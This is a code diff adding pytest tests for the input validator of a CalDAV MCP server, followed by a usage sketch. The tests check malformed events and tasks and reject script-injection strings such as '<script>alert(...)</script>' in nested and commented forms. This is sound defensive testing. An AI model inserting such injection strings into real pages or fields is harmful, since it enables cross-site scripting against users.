+        for malformed_event in malformed_events:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_event(malformed_event)
+
+        # Note: Extreme dates (1900, 3000) are actually valid in Python datetime
+        # and don't violate our validation rules - CalDAV servers should handle them
+
+    def test_malformed_task_data_combinations(self):
+        """Test malformed task data scenarios"""
+        # Test individual validation failures (these will definitely fail)
+        with pytest.raises(ValidationError):
+            InputValidator.validate_task(
+                {
+                    "summary": "Bad Task",
+                    "priority": 999,  # Invalid priority (>9)
+                }
+            )
+
+        with pytest.raises(ValidationError):
+            InputValidator.validate_task(
+                {
+                    "summary": "Bad Task",
+                    "percent_complete": 150,  # Invalid percentage (>100)
+                }
+            )
+
+        # Note: Business logic conflicts (like COMPLETED with 50% complete)
+        # are not validated at the input validation layer - that's handled
+        # at the business logic layer
+
+    def test_circular_related_to_references(self):
+        """Test detection of potential circular references in RELATED-TO"""
+        # While we can't detect circular refs at validation level,
+        # we should ensure the UIDs themselves are valid
+        circular_refs = [
+            "task-1",  # Valid UID format
+            "task-1",  # Duplicate - this should be handled at business logic level
+        ]
+
+        # Should validate individual UIDs successfully
+        result = InputValidator.validate_related_to(circular_refs)
+        assert len(result) == 2
+        assert all(uid == "task-1" for uid in result)
+
+    def test_deeply_nested_dangerous_content(self):
+        """Test deeply nested or complex dangerous content"""
+        nested_dangerous = [
+            "<div><span><script>alert('deep')</script></span></div>",
+            "<!-- <script>alert('commented')</script> -->",
+            "<<script>alert('nested')<</script>>",
+            "<script>alert('entity')</script>",
+        ]
+
+        for dangerous in nested_dangerous:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_text_field(dangerous, "description")
+            assert "potentially dangerous content" in str(exc_info.value)
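
Read together, these test classes document the surface of chronos_mcp.validation.InputValidator that this release ships: text, datetime, UID, email, event, attendee, RRULE, task, journal, category, RELATED-TO, and URL validators, plus the is_private_ip helper used for SSRF protection. As a rough orientation only, the short sketch below shows how a caller might invoke that API; it is inferred from the assertions in this diff, so the exact signatures, keyword arguments, and error messages should be treated as assumptions rather than package documentation.

    # Illustrative sketch only: usage inferred from the test assertions above;
    # signatures and error messages are assumptions, not package documentation.
    from chronos_mcp.exceptions import ValidationError
    from chronos_mcp.validation import InputValidator

    raw_event = {
        "summary": "Team Meeting",
        "dtstart": "2025-07-10T10:00:00",
        "dtend": "2025-07-10T11:00:00",
    }

    try:
        # Returns a normalized dict; dtstart/dtend come back as datetime objects.
        event = InputValidator.validate_event(raw_event)
        # HTTPS only; hostnames resolving to private or loopback IPs are rejected.
        url = InputValidator.validate_url("https://caldav.example.com/cal")
    except ValidationError as exc:
        # Dangerous content, inverted date ranges, or SSRF-prone URLs end up here.
        print(f"Rejected: {exc}")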